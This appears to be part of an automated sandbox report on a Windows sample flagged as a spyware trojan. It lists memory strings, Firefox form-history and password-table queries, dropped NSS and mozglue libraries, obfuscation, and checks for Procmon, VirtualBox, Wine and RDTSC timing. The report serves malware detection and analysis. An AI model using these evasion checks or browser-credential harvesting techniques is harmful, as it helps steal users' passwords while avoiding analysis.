Source: file.exe, 00000000.00000002.1931054359.0000000029271000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1910986531.0000000000799000.00000004.00000020.00020000.00000000.sdmp, BKEHDGDGHCBGCAKFIIIE.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: HDAFBGIJ.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.1931054359.0000000029271000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1910986531.0000000000799000.00000004.00000020.00020000.00000000.sdmp, BKEHDGDGHCBGCAKFIIIE.0.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: HDAFBGIJ.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: JJEGIJEGDBFHDGCAFCAEBGCGCB.0.dr String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1911292762.000000000099A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: JJEGIJEGDBFHDGCAFCAEBGCGCB.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.1911292762.000000000099A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: JJEGIJEGDBFHDGCAFCAEBGCGCB.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.1911292762.000000000099A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.1850353112.000000002951D000.00000004.00000020.00020000.00000000.sdmp, JJEGIJEGDBFHDGCAFCAEBGCGCB.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.1911292762.000000000099A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.1911292762.000000000099A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: JJEGIJEGDBFHDGCAFCAEBGCGCB.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1911292762.000000000099A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1850353112.000000002951D000.00000004.00000020.00020000.00000000.sdmp, JJEGIJEGDBFHDGCAFCAEBGCGCB.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary
barindex
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C150EF 0_2_00C150EF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C100A4 0_2_00C100A4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CFE865 0_2_00CFE865
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DB7012 0_2_00DB7012
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D0C1E3 0_2_00D0C1E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D14929 0_2_00D14929
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BBB29E 0_2_00BBB29E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C74A3C 0_2_00C74A3C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D03B78 0_2_00D03B78
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D12CFB 0_2_00D12CFB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BF3C33 0_2_00BF3C33
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D08C6F 0_2_00D08C6F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C8BDDA 0_2_00C8BDDA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CFCD95 0_2_00CFCD95
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D0566E 0_2_00D0566E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D0AE01 0_2_00D0AE01
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BE7733 0_2_00BE7733
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 009445C0 appears 316 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.1934369554.000000006F902000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.1934242433.000000006C855000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: qhqjdapc ZLIB complexity 0.995020427178899
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/22@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00958680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 0_2_00958680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00953720 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 0_2_00953720
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\XTXZOU77.htm Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.1926092694.000000001D335000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1934160372.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1933899648.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.1926092694.000000001D335000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1934160372.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1933899648.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.1926092694.000000001D335000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1934160372.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1933899648.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.1910986531.00000000006CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT fieldname, value FROM moz_formhistory;
Source: file.exe, 00000000.00000002.1926092694.000000001D335000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1934160372.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1933899648.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.1926092694.000000001D335000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1934160372.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1933899648.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.1926092694.000000001D335000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1933899648.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.1926092694.000000001D335000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1934160372.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1933899648.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1775529211.000000001D234000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1926092694.000000001D335000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1933899648.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1926092694.000000001D335000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1933899648.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe String found in binary or memory: ft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d
Source: file.exe String found in binary or memory: m/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 1830400 > 1048576
Source: file.exe Static PE information: Raw size of qhqjdapc is bigger than: 0x100000 < 0x198c00
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1934333564.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1934160372.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.1934160372.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1934333564.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.940000.0.unpack :EW;.rsrc :W;.idata :W; :EW;qhqjdapc:EW;viofhgtu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;qhqjdapc:EW;viofhgtu:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00959860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00959860
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x1c0161 should be: 0x1c47c6
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: qhqjdapc
Source: file.exe Static PE information: section name: viofhgtu
Source: file.exe Static PE information: section name: .taggant
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DB10C1 push 6D2F3631h; mov dword ptr [esp], ebx 0_2_00DB10F3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DB10C1 push ebx; mov dword ptr [esp], ebp 0_2_00DB114F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DB10C1 push 5CA12A13h; mov dword ptr [esp], edi 0_2_00DB11A7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D228F1 push ebp; mov dword ptr [esp], 57EEF193h 0_2_00D22920
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D228F1 push edx; mov dword ptr [esp], 7FE270FEh 0_2_00D2294E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D228F1 push ebp; mov dword ptr [esp], 62E696B9h 0_2_00D22974
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DDD8F0 push ebp; mov dword ptr [esp], ecx 0_2_00DDD8F4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C150EF push ebx; mov dword ptr [esp], eax 0_2_00C15108
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D458E5 push 76F9B28Ch; mov dword ptr [esp], ebp 0_2_00D45BB6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D458E5 push ecx; mov dword ptr [esp], edi 0_2_00D45BBF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D280E8 push 0D18FE0Ah; mov dword ptr [esp], esi 0_2_00D2898E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BBB8E4 push 22D590A1h; mov dword ptr [esp], eax 0_2_00BBB92F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BBB8E4 push 40423E85h; mov dword ptr [esp], ebx 0_2_00BBB95D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C100A4 push ecx; mov dword ptr [esp], edi 0_2_00C100EB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C100A4 push eax; mov dword ptr [esp], edi 0_2_00C10127
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C100A4 push 099737A4h; mov dword ptr [esp], eax 0_2_00C10163
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C100A4 push 3176559Fh; mov dword ptr [esp], esi 0_2_00C10176
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C100A4 push esi; mov dword ptr [esp], ebx 0_2_00C1017F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C100A4 push esi; mov dword ptr [esp], 6A7C93F7h 0_2_00C10203
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C100A4 push 6FB3A968h; mov dword ptr [esp], edx 0_2_00C1025F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D898B3 push ecx; mov dword ptr [esp], 3FF9056Bh 0_2_00D898D3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0095B035 push ecx; ret 0_2_0095B048
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CFE865 push 005094F1h; mov dword ptr [esp], ebp 0_2_00CFE91D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CFE865 push 42D58BACh; mov dword ptr [esp], ebx 0_2_00CFE9C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CFE865 push edi; mov dword ptr [esp], ecx 0_2_00CFEA7D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CFE865 push 0CE21CADh; mov dword ptr [esp], ebx 0_2_00CFEB04
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CFE865 push 39929194h; mov dword ptr [esp], edi 0_2_00CFEB7D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CFE865 push ebx; mov dword ptr [esp], 619723C2h 0_2_00CFEC01
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CFE865 push edi; mov dword ptr [esp], 4F94E26Ah 0_2_00CFEC4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CFE865 push ebp; mov dword ptr [esp], eax 0_2_00CFEC76
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CFE865 push ecx; mov dword ptr [esp], edx 0_2_00CFEC91
Source: file.exe Static PE information: section name: qhqjdapc entropy: 7.954381460640202
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00959860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00959860

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D197DB second address: D197DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D197DF second address: D197E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D197E9 second address: D1981E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F12792CFFA6h 0x0000000d jmp 00007F12792CFFB5h 0x00000012 je 00007F12792CFFA6h 0x00000018 popad 0x00000019 popad 0x0000001a js 00007F12792CFFD0h 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18822 second address: D1882F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jl 00007F127853B646h 0x0000000c popad 0x0000000d rdtsc
